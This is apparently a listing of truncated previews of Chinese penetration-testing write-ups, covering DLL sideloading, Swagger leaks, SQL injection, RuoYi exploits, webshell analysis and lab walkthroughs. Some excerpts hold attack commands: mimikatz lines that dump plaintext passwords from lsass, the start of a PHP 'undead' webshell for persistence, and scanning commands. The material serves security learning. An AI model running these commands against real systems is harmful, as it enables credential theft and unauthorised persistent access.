前言 DLL侧载(DLL Sidloading)是一种恶意软件常用的规避检测的攻击技术,攻击者利用应用程序加载动态链接库(DLL)的机制-顺序搜索和模糊调用,通过在特定位置放置恶意DLL,诱使应用程序加载并执行这些恶意DLL,以实现恶意代码的实行,提权操作或是和C2服务器通讯等恶意行为。 DLL顺序搜索机制 在Winodws中,大部分应用程序的操作都会涉及到动态链接库DLL,DLL是一个共享文件,
0x1 前言 这篇文章的话主要是给师傅们分享下Swagger接口泄露包括未授权访问然后导致信息泄露相关的一些常见姿势。然后先从Swagger漏洞的相关简介,再到相关使用的插件包括工具等的使用,然后再从实战中的案例进行解析和讲解。 0x2 漏洞描述 swagger接口泄露 某公司平台系统存在敏感信息泄露漏洞,由于对swagger-ui未做好访问控制措施,导致攻击者可以通过swagger页面获取网站A
一、前言 某渗透项目中和队友配合挖到一个通用系统漏洞,主要对JS接口进行分析,经历一波绕waf的曲折最终getshell,文笔粗劣,大佬勿喷。 二、JS分析 在看到某系统仅仅一个登陆框,一波弱口令尝试和目录扫描,啥也没有。 队友通过JS分析发现大量接口,主要是跟着师傅的思路走一遍,不得不说如果没有这个JS接口基本很难有啥成果了(状态码带200的都是可访问的接口文件,这里有一个坑点,后面讲) 对
内网提权 高权限读取本地密码 当域管理员在域成员主机上登录进行工作时,会将明文密码或哈希保存在本地 lsass.exe进程中,可以通过mimikatz来读取到本地的明文密码。 privilege::debug # 提权 sekurlsa::logonpasswords mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" >
0x1 前言 下面给师傅们分享的案例呢是前段时间实战的一个站点,也是我朋友前段时间让我测的一个站点。整体的测试流程也还算ok,然后里面有些细节要是对师傅们有帮助可以收藏下,后面主要是利用FUZZ打了一个sql注入漏洞上去。 0x2 fuzz和sql结合的简介 fuzz简介 fuzz其实就是一种对请求参数的模糊测试,简单来说就是对一个接口的某个参数或多个参数用自定义的内容进行批量提交,根据接口返回内
前言 作为一个渗透测试人员的话可能我们需要对渗透成功的服务器进行权限维持,以防止服务器掉线或者被有关人员发现我们的渗透痕迹导致防守人员发现渗透测试人员的攻击事件从而导致整个项目停止等一些的问题。 Windows权限维持 PHP不死马权限维持 <?php ignore_user_abort(); //与客户端进行长连接,关掉浏览器,PHP脚本也可以继续执行. set_time_limit(0)
0x1 前言 这篇文章也是在前几天跟着我几个厉害的师傅一起学习学的多种nday的打法,然后自己也是花了很多的时间在网上找相关若依系统的nday打法,然后自己利用FOFA和鹰图进行资产收集,然后进行渗透测试各个站点,然后把若依常见的姿势打出来给师傅们分享下! 0x2 若依系统简介 Ruoyi(若依)是一款基于Spring Boot和Vue.js开发的快速开发平台。它提供了许多常见的后台管理系统所需的
0x1 前言 这几天跟着我那几个师傅们在学习URL重定向漏洞,学习了比较多的对于这个漏洞的骚技巧,以及在挖掘edusrc漏洞和企业src相关的URL重定向漏洞时的一些技巧和不错的思路。 最近在跟我那几个师傅们研究学习URL重定向漏洞,然后在一些厂商项目中开始接触到一些url任意重定向,虽然是低危,奖金较低,但是一个厂商所有点的url跳转加起来奖金也比较可观,所以将自己挖掘过程中一点点心得分享一下。
文章前言 在之前处理一起应急事件时发现攻击者在WEB应用目录下上传了webshell,但是webshell似乎使用了某种加密混淆手法,无法直观的看到其中的木马连接密码,而客户非要让我们连接webshell来证实此文件为后门文件且可执行和利用(也是很恼火,本来就结束了,还得分析webshell),遂对提取到的webshell进行解密分析操作看看到底其内容是什么以及看一下这个其中到底使用了那种加密混淆
介绍:又一次公司的测内网系统项目的出现了流量加密,于是进行前端调试js逆向后对其流量反解密进行渗透(一次简单记录分享,大佬勿喷) 登录系统后,查看了历史数据包,基本上都是/api/xxx/xxx?params=加密数据这样的接口,所以就怀疑系统对流量做了加密,于是在前端调试开始找加密代码。 # 其中一个数据包展示 GET /api/foidisplay/mzhyxyhhxjbxx/getBqCo
前言 两个月之前的一个渗透测试项目是基于某网站根域进行渗透测试,发现该项目其实挺好搞的,就纯粹的没有任何防御措施与安全意识所以该项目完成的挺快,但是并没有完成的很好,因为有好几处文件上传没有绕过(虽然从一个搞安全的直觉来说这里肯定存在文件上传),那话不多说,进入正题吧。 步骤 拿到根域,简单进行一个子域名收集,利用360quake搜索,发现大量gitlab服务,我猜测是蜜罐并且很难从这一点进行利用
春秋云境-GreatWall title: GreatWall description: 在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务,然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务,从
0x1 前言 这里主要还是介绍下新手入门edusrc漏洞挖掘以及在漏洞挖掘的过程中信息收集的部分哈!(主要给小白看的,大佬就当看个热闹了)下面的话我将以好几个不同的方式来给大家介绍下edusrc入门的漏洞挖掘手法以及利用github信息收集的过程以及给师傅们分享一些比较好用的工具哈。 0x2 信息收集——github 介绍: 在漏洞挖掘的过程前期我们进行信息收集,github和码云搜索相关的信息,
0# 概述 哈哈,各位师傅好久不见啦,最近比较忙,抽空将本文写出来~ 说到信息搜集,一般大家都会联想到Web外部打点的暴露面信息搜集。 但在内网渗透的过程中,信息搜集也是决定成败的决定性因素 特别是做持久化渗透中,对内网的信息搜集是尤其重要的,让我们来看看内网渗透之信息搜集骚姿势。 1# 内网渗透信息搜集思路 因为是讲骚姿势,常规的查看系统信息之类的我就不写了,写写一些别人没写过的东西 内网渗透
一.攻击过程 1.信息收集 (1)存活扫描 nmap 192.168.10.0/24 (2)端口扫描 之后进行全端口扫描 nmap -p- 192.168.10.139 发现端⼝:1433,这个端⼝是sql server的默认端⼝ 得到端口27689 访问 (3)目录扫描 口令爆破无果 之后目录扫描查看是否泄露敏感文件 dirsearch -u http://192.168.10.13